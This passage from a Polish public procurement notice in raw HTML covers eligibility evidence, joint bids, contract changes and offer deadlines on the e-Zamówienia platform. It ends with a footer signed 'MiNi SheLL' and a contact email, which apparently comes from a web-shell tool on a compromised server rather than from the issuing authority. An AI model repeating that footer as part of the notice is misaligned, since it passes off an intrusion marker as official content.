zawodowej, o ile wynika to z odrębnych przepisów. Ocena spełnienia warunku nastąpi poprzez weryfikację wstępnego oświadczenia wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP.<br/>3)	Sytuacji ekonomicznej lub finansowej. . Ocena spełnienia warunku nastąpi poprzez weryfikację następujących dokumentów:<br/>a) oświadczenia wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP.<br/>b) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. <br/>4)	Zdolności technicznej lub zawodowej. Ocena spełnienia warunku nastąpi poprzez weryfikację wstępnego oświadczenia wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający będzie żądać następujących podmiotowych środków dowodowych:<br/>1) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający będzie żądać następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) oświadczenia (załącznik nr 4 do SWZ) wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1- 6 ustawy PZP,<br/>b) art. 109 ust. 1 pkt 4, 5 i 7 ustawy PZP.<br/>5. W celu potwierdzenia spełniania przez Wykonawcę warunków Zdolności do występowania w obrocie gospodarczym, Zamawiający nie będzie żądać dodatkowych podmiotowych środków dowodowych, wystarczające będzie oświadczenie wstępne, o którym mowa w punkcie 2.<br/>6. W celu potwierdzenia spełniania przez Wykonawcę warunków uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Zamawiający nie będzie żądać dodatkowych podmiotowych środków dowodowych, wystarczające będzie oświadczenie wstępne, o którym mowa w punkcie 2.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zgodnie z art. 58 ust. 1 ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy.<br/>3. W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo sporządzone w formie pisemnej, określające osobę pełnomocnika, zakres reprezentacji oraz zawierające wskazanie postępowania o udzielenie niniejszego zamówienia. Pełnomocnictwo powinni podpisać wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <br/>4. Pełnomocnictwo powinno być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Pełnomocnictwo do podpisania oferty winno być załączone do oferty, o ile nie wynika ono z przepisów lub innych dokumentów załączonych do oferty. <br/>5. Ofertę składa (podpisuje) pełnomocnik w imieniu wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia na zasadach ogólnych.<br/>6. W przypadku gdy oferta Wykonawców wspólnie ubiegający się o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego dostarczenia umowy regulującej współpracę tych Wykonawców.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w rozdziale XV pkt 2 ppkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>10. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym mowa w rozdziale XVIII pkt 2, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>11. Dokumenty, o których mowa w rozdziale XVIII pkt 5 potwierdzające brak podstaw do wykluczenia z postępowania składane są przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy. Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został<br/>określony w §16 Zmiany umowy - projekt umowy stanowiący załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferę składa się za pośrednictwem Platformy e-Zamówienia. W zakłdace „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” upuść”) służące do dodawania plików</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> brak

Creat By MiNi SheLL
Email: jattceo@gmail.com